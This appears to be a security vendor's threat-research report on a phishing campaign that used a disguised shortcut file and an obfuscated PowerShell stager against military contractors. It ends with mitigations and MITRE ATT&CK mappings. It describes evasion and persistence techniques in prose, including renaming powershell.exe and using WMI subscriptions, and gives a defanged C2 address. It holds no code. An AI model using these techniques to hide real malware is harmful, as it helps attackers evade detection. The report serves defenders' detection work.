Securonix Threat Research team recently discovered a new covert attack campaign targeting multiple military/weapons contractor companies, including likely a strategic supplier to the F-35 Lightning II fighter aircraft. The stager mainly employed the use of PowerShell, and while stagers written in PowerShell are not unique, the procedures involved featured an array of interesting tactics, persistence methodology, counter-forensics, and layers upon layers of obfuscation to hide its code.
Additionally, the remote infrastructure or command and control (C2) involved with the stager was relatively sophisticated.
Target Analysis and Attack Chain
The attack was carried out starting in late summer 2022, targeting at least two high-profile military contractor companies.
The overall attack chain can be seen in figure 1 on slide 2, which highlights the initial compromise phase of the attack.
Figure 1: Attack Chain (Slide 2)
Initial Infection: Shortcut to Code Execution
As with a lot of targeted campaigns, the initial infection begins with a phishing email sent to the target containing a malicious attachment. Similar to that of the STIFF#BIZON campaign reported earlier this year, the phishing email contains a compressed file containing a shortcut file, in this case, “Company & Benefits.lnk.”
Figure 2: Company & Benefits.pdf.lnk (Slide 3)
The shortcut file does some tricky things to avoid detection. First, it attempts to hide its execution by calling for files rather than cmd.exe or powershell.exe.
It then takes the powershell.exe executable file, copies it to C:Windows, renames it to AdobeAcrobatPDFReader, and then uses it to execute the rest of the PowerShell string. Logs generated from Sysinternals Sysmon identify this in figure 3 on slide 4.
Figure 3: Windows logs showing renamed PowerShell.exe (Slide 4)
The rest of the PowerShell script runs on a loop with a 120-second timeout or until an error is not produced. C2 communication is attempted at the URL: hxxps://terma[.]dev/0 to pull down the initial stager.
Overall, it is clear that this attack was relatively sophisticated, with the malicious threat actor paying specific attention to opsec. There were a lot of relatively recent attack techniques at play, some of which were unfamiliar and required additional analysis, such as leveraging the PowerShell Get-Alias command to perform an invoke expression.
Leveraging the registry, WMI subscriptions, scheduled tasks, and incorporating Lolbins with the process was overall clever and needs to be monitored. While this was a very targeted attack, the tactics and techniques used are well-known, and it is important to stay vigilant.
Securonix Recommendations and Mitigations
- Avoid downloading unknown email attachments/link files from non-trusted sources.
- Deploy PowerShell script block logging to assist in detections.
- Deploy additional process-level logging, such as Sysmon, for additional log coverage. Additionally, Sysmon installed on the host will prevent next-stage payload execution.
- Pay specific attention to attempts to disable security monitoring tools, including SIEM.
- Scan endpoints using the Securonix seeder hunting queries below.
MITRE ATT&CK Techniques
|Initial Access||T1566: Phishing|
T1027: Obfuscated Files or Information
T1140: Deobfuscate/Decode Files or Information
T1005: Data from Local System
T1112: Modify Registry
|Execution||T1059.001: Command and Scripting Interpreter: PowerShell
T1047: Windows Management Instrumentation
|Persistence||T1547: Boot or Logon Autostart Execution
T1053: Scheduled Task/Job
T1053.005: Scheduled Task/Job: Scheduled TaskT1546.003: Event-Triggered Execution: Windows Management Instrumentation Event Subscription